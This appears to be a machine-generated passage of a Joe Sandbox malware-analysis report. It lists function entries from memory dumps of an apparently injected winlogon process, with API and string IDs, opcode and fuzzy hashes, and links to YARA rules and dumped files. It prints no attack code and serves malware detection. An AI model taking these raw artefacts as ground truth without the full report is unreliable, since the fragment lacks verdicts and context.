                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: 651bfc5cbe62972ce412047165ad2960c9386d91b47683266e397b6bd680f957
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: B70129AD611F64D2EB259FAAE80C71963A1BB58F47F448928CA4D0A7A4EF3DC048C705
                                                                  Function 00000225DC643B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: 6d6dee9c8b988b8c960d8bf2efcbedb05f54f536ad4f7f4526b6a49934ac6788
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 3B01406D615F6492EB659FAAE81C71973A1BB58B47F148428CE4D07764EF3DC048C700
                                                                  Function 00000225DC679418 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction ID: 331cac13de4a1d5e5a87d7170c2ed0523d350219ef8271f1c272c534d0aa47de
                                                                  • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction Fuzzy Hash: 0951DF3A301A30AAEB14CFA9E448B5937E5F340B89F50C924EE4647BCCEB35C842C700
                                                                  Function 00000225DC649418 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction ID: f5823a9b22667114cd8b5c1aeae8c9b4c2165beb17b007c3293f5b40c57351a0
                                                                  • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction Fuzzy Hash: 5451D53A75DE20AAEB58CF69E448B5937A9F340B89F60C164DE4747B8CEB35C942C700
                                                                  Function 00000225DC618835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: a6b0794c75841da20a792ef5e4afd1a9bd3fbb2aaa1a50b1d3e5b2669cfb1a4c
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: 3D51AC3A613A60AAEF54DBADE448B183795F348B9BF12CA24DE4647788EB34C841C701
                                                                  Function 00000225DC618818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 1494e730365a2f0a6ae5db4802ee312b21c338a21c34c55c443d90b8e94265ba
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 2E31E239612B60A6EB64DF6AE84871937A4F348BDBF16C614EE8B03785DB38C940C704
                                                                  Function 00000225DC6719D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: d201a2ba865f6eb93eb8cbea412ab5212b5dd1f9b084a4e0371b795d7105d77c
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 75F04466304E91A2EB20CB99F5987596360FB44B9AF94C021DB4D469D5DE7CC688C700
                                                                  Function 00000225DC6419D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 2a562515401db3ec1847c4bd8a889b771188d13b04b24603220abf2d91229865
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 65F06876318EA1A2EB708FA9F5DC7597361F744B9AF94C020DB4946654DF7CC688C700
                                                                  Function 00000225DC67330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: 632e31d88c0de5fdd8a951e1f5dec93f5dcd33d730e0f0e2fb0e884230447319
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: B8F08C68304FA0A2EA10CBDBB9081196264BF48FD2F88E131EF5A07B98CF3CC485C701
                                                                  Function 00000225DC67C0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: 42bc6e568892c425fe8218c574faa936cf8aed9afda0bcf8071f2235d0a94ca1
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: 22F06D79311E14B1EE10CBA8E8983696320AF897A7F949629DB6A466E4CF3CC048D701
                                                                  Function 00000225DC64330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: 479b22c3b55937938ba476dbb00257b469cf8fbd5b694575692647eb7532fc0e
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 25F08C68328FA4A2EA108BDBB9081196265BB48FC2F18E070EF5B07B18CF3CC445C700
                                                                  Function 00000225DC64C0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: 3f20312927c5cf34273e228f224d8fa3b09680169f4820750eb3f37ccaa7208d
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: BEF06279329E14A1FE108BA8E85835A6320AB457A6F649215CA6A463E4CF3CC048C700
                                                                  Function 00000225DC675500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: 9458e87709c0537850aba61c84c8459c5dd43c87592c7d6318e3574cf0b6e6b4
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: 7802DC36219F94D6EBA0CB99E49835AB7A0F3C4795F104516EA8E87BA8DF7CC445CF00
                                                                  Function 00000225DC675B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: a0d6f7afcc9799476be7dcadd02c4e3f00a8bd3a34571f263286be7a9c4d9ca7
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: FE61FB3A119F94D6E760CB99E45831AB7E0F388785F10955AEA8D47FA8DB7CC541CF00
                                                                  Function 00000225DC645B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a399a8a3480e5286733dee629d595f0dfa00166fbe197ee651739a5ca29e7d23
                                                                  • Instruction ID: a71204ad736724b85443c3307d09df296dc5beec14a2dc070c75e0221bedc93a
                                                                  • Opcode Fuzzy Hash: a399a8a3480e5286733dee629d595f0dfa00166fbe197ee651739a5ca29e7d23
                                                                  • Instruction Fuzzy Hash: E961CD3A51DF94D6E760CB99E45831AB7E0F388785F50915AEA8E47BA8DB7CC540CF00
                                                                  Function 00000225DC684534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 7322198d80e44e497bc7a289fd2cdf6cd2da7f702028459f513855af0387f513
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 0711827BA50E3125FA54D2ECE47E37D1181EF5C37AF48C634AA76166EACB388845C203
                                                                  Function 00000225DC623934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 72e154a6b4cae6404a3d4c4bb79bc8880f4dc1766344bfd7bec36ab6af0a240d
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 6F11063AE04E3161FA5416ECE44E369C045AB57B72F05C635AA770E2DAEB348885E100
                                                                  Function 00000225DC654534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: ee21d0f83ec9541119527f3577d3b73e221ed8c0e9043e265e4204de05dff962
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 0311863BA30E3121FB5412EDE45D3791191EF9837AF78C6B4AA77066DECB388945C200
                                                                  Function 00000225DC67AE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 19ac1e544695c7c8cc9d33951118051c7b4729e4b68dabd50510bed835dde96b
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: 2D61997B600F949AEB20CFA9D4843AD77A0F388B89F149615EF5917F9ADB38C585C700
                                                                  Function 00000225DC64AE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
